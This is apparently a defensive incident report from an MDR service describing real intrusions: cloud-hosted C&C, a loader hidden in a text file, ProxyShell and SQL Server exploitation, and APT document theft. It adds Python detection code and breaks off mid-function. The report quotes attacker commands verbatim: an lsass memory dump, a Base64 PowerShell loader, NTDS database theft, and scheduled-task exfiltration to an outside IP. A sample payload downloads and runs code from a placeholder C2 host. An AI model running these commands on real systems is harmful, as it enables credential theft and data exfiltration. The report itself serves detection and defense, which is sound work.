
Introduction
This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.
Command and control via the public cloud
The use of public cloud services such as Amazon, Azure or Google can make an attacker's server difficult to spot: the beacon traffic goes to a well-reputed domain and blends in with legitimate use of the same platform. Kaspersky has reported several incidents where attackers used cloud services for C&C.
Case #1: Cloudflare Workers as redirectors
Case description
The incident started when an antimalware (AM) engine memory scan in Kaspersky MDR fired the verdict MEM:Trojan.Win64.Cobalt.gen, which indicates a post-exploitation framework, presumably Cobalt Strike. The flagged memory region belonged to the process c:\windows\system32\[legitimate binary name][1].exe, that is, the payload had been injected into a legitimate system binary.
While investigating, we found that the process had initiated network connections to a potential C&C server:
hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence]
hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out]
The workers[.]dev suffix indicates a Cloudflare Workers script. The attacker used the Worker as a redirector that forwards beacon traffic to the real C&C server, so network telemetry on the victim side shows only a Cloudflare-hosted hostname with a good reputation.
We then found that, earlier, the binary had made an unsuccessful[2] attempt to dump the memory of lsass.exe by calling the MiniDump export of comsvcs.dll through rundll32.exe, with the PID of lsass.exe taken from tasklist output:
CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full
Several minutes later, a suspicious .bat script was run. It registered a WMI event consumer, which MDR later classified as an additional persistence mechanism (see T1546.003 in the table below).
The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.
Case detection
The table below lists the signs of suspicious activity that were the starting point for the investigation by the SOC.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1588.002: Tool
AM verdict: MEM:Trojan.Win64.Cobalt.gen, which covers in-memory Cobalt Strike and Meterpreter payloads
A malicious payload was executed in the victim’s system and started communicating with the C&C server
T1620: Reflective Code Loading
AM verdict: MEM:Trojan.Win64.Cobalt.gen
The malicious payload migrated to the victim’s memory
Detection of code injection from an unknown binary into a system binary
T1071.001: Web Protocols
Suspicious HTTP connections to the malicious URL: blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level
The attacker’s communications with the C&C server
T1584.006: Web Services
URL reputation, regular expression in URL
The attacker’s communications with the C&C server
T1102.001: Dead Drop Resolver
URL reputation, regular expression in URL
The attacker’s communications with the C&C server
T1003.001: LSASS Memory
AM detection on lsass memory access
The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file
Regex on a command line like: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass PID> lsass.dmp full
T1546.003: Windows Management Instrumentation Event Subscription
WMI active script event consumer created remotely
The attacker gained persistence through active WMI
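As an added example (our code, not code from the Securelist report or from Kaspersky MDR), the following Python implements the command-line check that the T1003.001 row above describes. It recognizes rundll32 calling the MiniDump export of comsvcs.dll by name or by ordinal (#24), then decides whether lsass is the target either from a resolvable PID (a constructed pid-to-image table stands in for process telemetry) or from an lsass reference elsewhere in the same command line, which is what the for /f wrapper in the case above leaves behind when the PID itself is a batch variable. The function names, the sample command lines and the pid table are assumptions made for the example.

```python
import re

# rundll32 loading comsvcs.dll and calling its MiniDump export by name or by
# ordinal (#24). Case-insensitive; tolerates a full or quoted DLL path and the
# optional comma between the DLL and the export name.
_COMSVCS_MINIDUMP = re.compile(
    r"rundll32(?:\.exe)?\s+[\"']?(?:[^\s\"']*[\\/])?comsvcs\.dll[\"']?\s*,?\s*"
    r"(?:minidump|#24)\b",
    re.IGNORECASE,
)
_LSASS = re.compile(r"\blsass(?:\.exe)?\b", re.IGNORECASE)

LSASS_VERDICT = "T1003.001: LSASS memory dump via comsvcs.dll MiniDump"


def classify_comsvcs_dump(cmdline, pid_table=None):
    """Return None if cmdline is not a comsvcs MiniDump call, otherwise a verdict.

    The first argument after MiniDump is the target PID. When it is a literal
    number it is resolved through pid_table (pid -> image name), which stands in
    for process telemetry. When it is a batch or PowerShell variable such as
    ^%B or $pid, the target is inferred from any lsass reference elsewhere in
    the command line (the tasklist filter, a Get-Process call, or the dump name).
    """
    m = _COMSVCS_MINIDUMP.search(cmdline)
    if m is None:
        return None
    args = cmdline[m.end():].split()
    pid_arg = args[0] if args else ""
    image = None
    if pid_arg.isdigit() and pid_table:
        image = pid_table.get(int(pid_arg))
    if (image and image.lower() == "lsass.exe") or _LSASS.search(cmdline):
        return LSASS_VERDICT
    return "comsvcs.dll MiniDump of PID %s (target unresolved)" % (pid_arg or "?")


def scan(cmdlines, pid_table=None):
    """Run the classifier over a batch of command lines; keep only the hits."""
    hits = []
    for line in cmdlines:
        verdict = classify_comsvcs_dump(line, pid_table)
        if verdict:
            hits.append((verdict, line))
    return hits


# Constructed sample telemetry modelled on the case above (not the real lines).
PID_TABLE = {624: "lsass.exe", 4120: "notepad.exe"}
SAMPLE_CMDLINES = [
    # batch wrapper: the PID is the variable ^%B, lsass is named only in the tasklist filter
    r'''CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') '''
    r'''do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\dump.doc full''',
    # ordinal form with a literal PID that resolves to lsass.exe
    r'rundll32.exe "C:\Windows\System32\comsvcs.dll", #24 624 C:\Windows\Temp\out.dmp full',
    # same export, but the PID resolves to a non-sensitive process
    r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 4120 C:\Temp\app.dmp full",
    # benign rundll32 uses
    r"rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl",
    r"rundll32.exe C:\Windows\System32\comsvcs.dll",
]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_CMDLINES, PID_TABLE):
        print(verdict, "<-", line[:80])
```

Without a process table the ordinal form with a literal PID still fires, but only as an unresolved MiniDump; resolving the PID against process-creation telemetry is what turns it into a T1003.001 verdict, so the rule is only as good as the telemetry join behind it.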
Payload hidden in long text
Case #1: A scheduled task that loads content from a long text file
Case description
This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.
Scheduled task:
\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A}, C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9
Command:
"wscript.exe" /e:vbscript /b "C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"
The scheduled task invokes a VBS script (file path: C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708) and passes it a PowerShell one-liner as an argument. That one-liner reads 422 bytes at offset 1874201 of the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys, Base64-decodes them, and executes the result as a script block.
The VBS script mimics the content and behavior of the legitimate C:\Windows\System32\SyncAppvPublishingServer.vbs, a signed Microsoft script that hands its argument string to PowerShell (hence the leading "n;" in the command above), but it lives under a different path and name. The task's own action therefore looks like a script-host invocation rather than a PowerShell command.
The customer approved our MDR SOC analyst’s request to analyze the file C:WindowsSystem32driversS2cZVnXzpZ2F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content (see the picture below).
The decoded payload contained a link to a C&C server:
Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):
C:\Users\<… cut out …>\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe
The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.
Fortunately, the telemetry analysis did not reveal any successful communication with the discovered C&C server (counter[.]wmail-service[.]com), which would have allowed further stages of the infection to be downloaded. In the meantime, a new AM engine signature was released, and the malicious samples are now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was classified as malicious.
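As an added example (our code, not the report's or Kaspersky's), the following Python does the two things a hunter would do with such a file. carve_at_offset reproduces the loader's own extraction step (take count bytes at index, Base64-decode, read as UTF-8), and find_hidden_payloads scans an arbitrary text file for Base64 runs that decode to printable text, reporting the line at which each one starts, the same fact the table below records as "starting on line 4890". The file contents, the offset and length, and the decoded PowerShell stub with its placeholder URL are all constructed for the example.

```python
import base64
import binascii
import re
import string

_PRINTABLE = set(string.printable)
_MIN_RUN = 32  # shortest Base64 run worth decoding; shorter ones are mostly noise


def carve_at_offset(data, index, count):
    """Reproduce the loader's extraction step: take `count` bytes at `index`,
    treat them as a UTF-8 Base64 string, and return the decoded script text
    (the .NET GetString -> FromBase64String -> GetString chain in the task above)."""
    b64 = data[index:index + count].decode("utf-8")
    return base64.b64decode(b64).decode("utf-8")


def _decode_if_text(run):
    """Base64-decode a candidate run; return the text if it is printable, else None."""
    padded = run + "=" * (-len(run) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if not text or sum(c in _PRINTABLE for c in text) / len(text) < 0.95:
        return None
    return text


def find_hidden_payloads(data, min_run=_MIN_RUN):
    """Scan a text file for Base64 runs that decode to printable text.

    Each hit carries the 1-based line number, the byte offset and length of the
    run (the two values a loader like the one above needs), and the decoded text.
    Runs that decode to binary junk are dropped, which separates an embedded
    script from a long GUID or a run of padding characters.
    """
    text = data.decode("utf-8", errors="replace")
    pattern = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_run)
    hits = []
    for m in pattern.finditer(text):
        decoded = _decode_if_text(m.group())
        if decoded is None:
            continue
        hits.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "offset": len(text[:m.start()].encode("utf-8")),
            "length": len(m.group()),
            "decoded": decoded,
        })
    return hits


# Constructed sample file: filler prose, a decoy run of 'A's that decodes to
# zero bytes (and is therefore discarded), and a Base64-encoded PowerShell stub
# whose URL is a placeholder, not an indicator from the report.
HIDDEN_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2')"
_ENCODED = base64.b64encode(HIDDEN_SCRIPT.encode()).decode()
_FILLER = "The quick brown fox jumps over the lazy dog. " * 20
SAMPLE_FILE = "\n".join([_FILLER] * 5 + ["A" * 64] + [_FILLER] * 3 + [_ENCODED] + [_FILLER] * 4).encode()
SAMPLE_OFFSET = SAMPLE_FILE.index(_ENCODED.encode())
SAMPLE_COUNT = len(_ENCODED)

if __name__ == "__main__":
    for hit in find_hidden_payloads(SAMPLE_FILE):
        print("line %(line)d offset %(offset)d length %(length)d: %(decoded)s" % hit)
```

The printable-ratio filter is what keeps the scanner usable on real files: long runs of Base64 alphabet characters are common (GUIDs, hashes, padding), but almost none of them decode to readable text.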
Case detection
The table below lists the attack techniques and how they were detected by Kaspersky MDR.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1547.001: Registry Run Keys / Startup Folder
Regex on autostart entry details
Malicious persistence
Heuristic AM engine verdict: HEUR:Trojan.Multi.Agent.gen
T1059.001: PowerShell
Regex on autostart entry details
Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression”
T1216.001: System Script Proxy Execution
Regex on command line
Malicious payload execution via a renamed copy of C:\Windows\System32\SyncAppvPublishingServer.vbs
T1204.002: Malicious File
Execution sequence: svchost.exe → explorer.exe → patch.exe, from the directory C:\Users\<… cut out …>\Downloads\ExcelAnalyzer 3.4.3\crack
The user executed a file downloaded by the Tixati BitTorrent client. As a result, the file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was created
Creation of c:\users\<… cut out …>\downloads\excelanalyzer 3.4.3\setup_excelanalyzer.exe, in this order: chrome.exe → tixati.exe
Creation of 02f4f239-0922-49fe-a338-c7460cb37d95.sys, in this order: svchost.exe → patch.exe
Process command line: "C:\Users\<… cut out …>\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe"
The contents of 02f4f239-0922-49fe-a338-c7460cb37d95.sys do not match the extension (text instead of binary)
T1027: Obfuscated Files or Information
T1140: Deobfuscate/Decode Files or Information
The suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response
02f4f239-0922-49fe-a338-c7460cb37d95.sys contained text; starting on line 4890, it contained a Base64-encoded payload
The attacker hid the payload inside a long text file
T1071.001: Web Protocols
The SOC checked for successful connections to the discovered C&C server.
A search for the attacker’s possible attempts to execute further stages of the attack
Server-side attacks on the perimeter
Case #1: A ProxyShell vulnerability in Microsoft Exchange
Case description
During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:
\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rqfja.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\yjiba.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\jiwkl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\qwezb.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\qspwi.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\premium\upxnl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\qikyp.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\resources\jvdyt.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\mgsjz.aspx
The Mailbox Replication service has no legitimate reason to write ASPX files, and the random five-letter names led our SOC analyst to conclude that those files were web shells. The first path also points to the mechanism: in the ProxyShell chain (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) the attacker, after gaining Exchange PowerShell access, issues a mailbox export request that writes a PST file containing the web shell into a web-served directory; the export is carried out by MSExchangeMailboxReplication.exe, and the destination is commonly given as a loopback admin-share path such as \\127.0.0.1\c$\..., which is exactly what appears above.
Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.
Similar behavior was detected the next day, this time an attempt at creating one file:
\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rmvbe.aspx
KES had blocked the exploitation attempts. Nonetheless, the attempts themselves showed that the chain had progressed as far as the export step, which means the Microsoft Exchange server was vulnerable and needed patching as soon as possible.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1190: Exploit Public-Facing Application
Heuristic AM engine verdict: PDM:Exploit.Win32.Generic
Exploitation attempt
T1505.003: Web Shell
Attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process
Web shell file creation
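As an added example (not from the report or from Kaspersky's tooling), the following Python applies the reasoning of the case above to file-creation telemetry: an Exchange service process writing a web-servable file (.aspx and friends) under an IIS or Exchange front-end directory is treated as a web shell drop, with no content inspection needed. It also folds the loopback admin-share form \\127.0.0.1\c$\... back onto the local drive, since a rule that matches only c:\inetpub\... would miss the first path in the list above. The process list, the web-root list and the sample events are assumptions made for the example.

```python
import re
from pathlib import PureWindowsPath

# Exchange service processes that have no business writing web content
# (assumed list for the example).
EXCHANGE_PROCESSES = {"msexchangemailboxreplication.exe", "w3wp.exe", "umworkerprocess.exe"}
# Directories served by IIS on an Exchange server (lower-case, assumed defaults).
WEB_ROOTS = (
    r"c:\inetpub\wwwroot",
    r"c:\program files\microsoft\exchange server\v15\frontend\httpproxy",
    r"c:\program files\microsoft\exchange server\v15\clientaccess",
)
WEB_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".soap"}
_LOOPBACK_ADMIN_SHARE = re.compile(r"^\\\\(?:127\.0\.0\.1|localhost)\\([a-z])\$\\(.*)$")


def normalize_path(path):
    """Lower-case the path and fold a loopback admin-share UNC form
    (\\127.0.0.1\c$\dir\file) back onto the local drive it denotes."""
    p = path.strip().lower()
    m = _LOOPBACK_ADMIN_SHARE.match(p)
    if m:
        p = "%s:\\%s" % (m.group(1), m.group(2))
    return p


def is_webshell_drop(process, path):
    """True when an Exchange service process creates a web-servable file under
    a web root. The combination alone is enough to alert on, as in the case above."""
    p = normalize_path(path)
    name = PureWindowsPath(process).name.lower()
    suffix = PureWindowsPath(p).suffix
    return (name in EXCHANGE_PROCESSES
            and suffix in WEB_EXTENSIONS
            and any(p.startswith(root) for root in WEB_ROOTS))


def hunt(events):
    """Filter (process, path) file-create events down to web shell drops."""
    return [normalize_path(path) for process, path in events if is_webshell_drop(process, path)]


# Constructed file-create events (process image, created path).
SAMPLE_EVENTS = [
    (r"C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxReplication.exe",
     r"\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\abcde.aspx"),
    (r"C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxReplication.exe",
     r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\xyzzy.aspx"),
    # legitimate: the same service writing its own log file
    (r"C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxReplication.exe",
     r"C:\Program Files\Microsoft\Exchange Server\V15\Logging\MailboxReplicationService\MRS_20210801.LOG"),
    # legitimate: an installer laying down web content
    (r"C:\Windows\System32\msiexec.exe",
     r"C:\inetpub\wwwroot\aspnet_client\system_web\default.aspx"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("web shell drop:", hit)
```

The web-root list should be generated from the actual IIS site and virtual-directory configuration of the server rather than hard-coded; the defaults above are only what a stock Exchange 2016/2019 install uses.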
Case #2: MS SQL Server exploitation
Case description
The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21—-181797 (Domain / username).
The SQL Server process attempted to create a suspicious file:
c:\windows\serviceprofiles\mssql$sqlexpress\appdata\local\temp\tmpd279.tmp
We also observed that a suspicious CLR assembly, db_0x2D09A3D665536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16, original file name evilclr.dll), had been loaded into the SQL Server process (c:\program files\microsoft sql server\mssql15.sqlexpress\mssql\binn\sqlservr.exe). Loading a user-defined CLR assembly is how an attacker with sufficiently high privileges on SQL Server turns database access into arbitrary code execution inside sqlservr.exe.
The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen and Trojan.Multi.GenAutorunSQL.b.
The SQL Server host had previously been observed to be reachable from the Internet and to be under scanning from Tor exit nodes.
After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands. For example:
The created SQL jobs attempted to connect to URLs like those shown below:
hxxp://101.39.<…cut…>.58:16765/2E<…cut…>2F.Png
hxxp://103.213.<…cut…>.55:15909/2E<…cut…>2F.Png
hxxp://117.122.<…cut…>.10:19365/2E<…cut…>2F.Png
hxxp://211.110.<…cut…>.208:19724/2E<…cut…>2F.Png
hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png
hxxp://217.69.<…cut…>.139:13171/2E<…cut…>2F.Png
hxxp://222.138.<…cut…>.26:17566/2E<…cut…>2F.Png
hxxp://222.186.<…cut…>.157:14922/2E<…cut…>2F.Png
hxxp://45.76.<…cut…>.180:17128/2E<…cut…>2F.Png
hxxp://59.97.<…cut…>.243:17801/2E<…cut…>2F.Png
hxxp://61.174.<…cut…>.163:15457/2E<…cut…>2F.Png
hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png
hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png
hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png
Some of the IP addresses were already on the deny list, while others were added in response to this incident.
We were not able to observe any other host within the monitoring scope attempt to connect to these IP addresses, which confirmed that the attack was detected at an early stage.
The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b) was detected on another SQL Server host, which was also accessible from the Internet.
Since the attack was detected in time and its further progress was blocked by the AM engine, the attacker was not able to proceed, and the customer corrected the network configuration errors that had exposed the server to the Internet.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1090.003: Multi-hop Proxy
T1595.002: Vulnerability Scanning
Reputation analysis showed the use of TOR network for scanning. The scanning activity was detected through network connection analysis and by the AM engine.
The attacker scanned the SQL Server host
T1190: Exploit Public-Facing Application
The server application sqlservr.exe launched powershell.exe, in the following order: services.exe → sqlservr.exe → powershell.exe
The attacker successfully exploited the SQL server
Execution of the object previously detected as an autostart entry with a bad reputation: sql:SQLEXPRESSdb_0x2D09A3D665537_fscbd; original file name: evilclr.dll
T1059.001: PowerShell
Command line analysis showed the use of PowerShell.
Malicious persistence via an SQL Server job
T1027: Obfuscated Files or Information
Regex- and ML-based analysis of the SQL Server Agent job command line
The attacker attempted to evade detection
Regex- and ML-based analysis of the services.exe → sqlservr.exe → powershell.exe execution sequence command line
T1505.001: SQL Stored Procedures
SQL Server Agent job analysis
Malicious persistence via an SQL Server job
Heuristic detects on PowerShell SQL Server Agent; verdict: HEUR:Trojan.Multi.Powecod.a
T1071.001: Web Protocols
The URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server.
The attacker’s C&C server
What does exfiltration in a real-life APT look like?
Case #1: Collecting and stealing documents
Case description
Kaspersky MDR detected suspicious activity on one particular host in the customer infrastructure, as the following process was started remotely by psexec:
“cmd.exe” /c “c:\perflogs\1.bat”, which in turn started:
findstr "10.<…cut…>.
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1
The wevtutil queries pull the most recent logon-related events (4624, 4623, 4768, 4776) for two named accounts, which tells the attacker whether and when those users recently authenticated on this host. After that, the following inventory commands were executed by the binary C:\ProgramData\USOPrivate\UpdateStore\windnphd.exe:
C:\Windows\system32\cmd.exe /C ping 10.<…cut…> -n 2
query user
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>
C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>
C:\Windows\system32\cmd.exe /C net group "domain admins" /domain
C:\Windows\system32\cmd.exe /C ping <hostname1>
C:\Windows\system32\cmd.exe /C vssadmin list shadows
C:\Windows\system32\cmd.exe /C ipconfig /all
C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$
Suspicious commands triggering actions in the Active Directory Database were executed:
C:\Windows\system32\cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit
C:\Windows\system32\cmd.exe /C dir c:\windows\system32\ntds.dit
C:\Windows\system32\cmd.exe /C dir c:
C:\Windows\system32\cmd.exe /C dir c:\windows\ntds\ntds.dit
After these commands were executed, the windnphd.exe process started an HTTP connection:
hxxp[:]//31.192.234[.]60:53/useintget
Then a suspicious file, c:\users\public\nd.exe (MD5 AAE3A094D1B019097C7DFACEA714AB1B), created by the windnphd.exe process, was used to copy the SYSTEM registry hive (which holds the boot key needed to decrypt the database) and the NTDS database into files with .txt names, which were then archived:
nd.exe c:\windows\system32\config\system c:\users\public\sys.txt
nd.exe c:\windows\ntds\ntds.dit c:\users\public\nt.txt
C:\Windows\system32\cmd.exe /C move *.txt c:\users\public\tmp
C:\Windows\system32\cmd.exe /C rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp
rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp
Later, the SOC observed that a suspicious scheduled task had been created on the same host:
schtasks /create /sc minute /mo 30 /ru system /tn tmp /tr "c:\users\public\s.exe c:\users\public\0816-s.rar 38[.]54[.]14[.]183 53 down" /f
The task executed a suspicious file, c:\users\public\s.exe (MD5 6C62BEED54DE668234316FC05A5B2320), every 30 minutes as SYSTEM.
This executable took the archive c:\users\public\0816-s.rar, the suspicious IP address 38[.]54[.]14[.]183 (located in Vietnam) and the port 53 as parameters.
The 0816-s.rar archive had been created via remote execution of the following command through psexec:
rar a -k -r -s -ta[Pass_in_clear_text] -m1 c:\users\public\0816-s.rar "\\10.<…cut…>\c$\users\<username4>\Documents\<DocumentFolder1>"
After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.
Similar suspicious behavior was detected on another host.
First, a suspicious file was created over the SMB protocol: c:\users\public\winpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).
Next, a task was created remotely via psexec.exe:
schtasks /create /sc minute /mo 30 /ru system /tn tmp /tr "c:\users\public\winpdasd.exe" /f
During task execution, an external network communication was detected, and certain discovery commands were executed:
hxxp://31[.]192.234.60:53/useintget
ping 10.<…cut…> -n 1
query user
net use
This was followed by a connection to a network share on the host 10.<…cut…> as <username3>:
C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>
More reconnaissance command executions were detected:
C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$\users\<username4>\AppData\Roaming\Adobe\Linguistics
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> |findstr rundll32.exe
tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>
C:\Windows\system32\cmd.exe /C taskkill /S 10.<…cut…> -U <domain>\<username3> -P <password> /pid <PID> /f
C:\Windows\system32\cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain>\<username3> /p "<password>" /tn Microsoft\Windows\Tcpip\dcrpytod
Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:
C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 30 /ru system /tn Microsoft\Windows\Network\windpch /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\windpchsvc.exe" /f
After that, C&C communications were detected:
hxxp://139.162.35[.]70:53/micsoftgp
This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.
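The sequence above (NTDS database and SYSTEM hive copied, archived with RAR, then pushed out by a custom tool over HTTP on 53/TCP) is easier to catch as a chain than as three separate alerts. As an added example (our code, not the report's or Kaspersky's), the following Python correlates constructed process and network events per host: it tags events as credential-material access, archiving, or a port/protocol mismatch (the generalization of "HTTP on the non-standard 53/TCP port" from the T1571 row in the table below), and reports a host where the three occur in that order within a time window. The event shape, the regexes, the expected-protocol table and all sample values are assumptions made for the example.

```python
import re
from collections import defaultdict

# Stage patterns (assumed for the example), matched against process command lines.
STAGE_PATTERNS = {
    # ntdsutil snapshots/IFM, direct ntds.dit access, or a shadow copy to read it from
    "ntds": re.compile(r"ntdsutil.*\b(?:snapshot|ifm)\b|\bntds\.dit\b|vssadmin\s+create\s+shadow", re.I),
    # archiver invoked in "add" mode: rar a ..., 7z a ...
    "archive": re.compile(r"(?:^|[\\\s])(?:rar|winrar|7z)(?:\.exe)?\s+a\b", re.I),
}
# Application protocol a sensor should see on a well-known port; anything else
# on that port (HTTP on 53/TCP in the case above) is a mismatch.
EXPECTED_PROTO = {53: "dns", 80: "http", 443: "tls", 22: "ssh", 25: "smtp"}
WINDOW_SECONDS = 24 * 3600


def stage_of(event):
    """Map one telemetry event to a chain stage, or None if it is unremarkable."""
    if event["type"] == "process":
        for stage, pattern in STAGE_PATTERNS.items():
            if pattern.search(event["cmdline"]):
                return stage
    elif event["type"] == "netconn":
        expected = EXPECTED_PROTO.get(event["dst_port"])
        if expected and event["app_proto"] != expected:
            return "exfil"
    return None


def correlate(events, window=WINDOW_SECONDS):
    """Return one chain per host where an ntds stage precedes an archive stage,
    which precedes a port/protocol mismatch, all within `window` seconds.
    The archive and ntds events reported are the nearest ones before the exfil."""
    by_host = defaultdict(list)
    for event in sorted(events, key=lambda e: e["ts"]):
        stage = stage_of(event)
        if stage:
            by_host[event["host"]].append((stage, event))
    chains = []
    for host, staged in by_host.items():
        for k, (stage, exfil) in enumerate(staged):
            if stage != "exfil":
                continue
            archive = ntds = None
            for earlier_stage, earlier in reversed(staged[:k]):
                if exfil["ts"] - earlier["ts"] > window:
                    break
                if archive is None and earlier_stage == "archive":
                    archive = earlier
                elif archive is not None and earlier_stage == "ntds":
                    ntds = earlier
                    break
            if ntds is not None:
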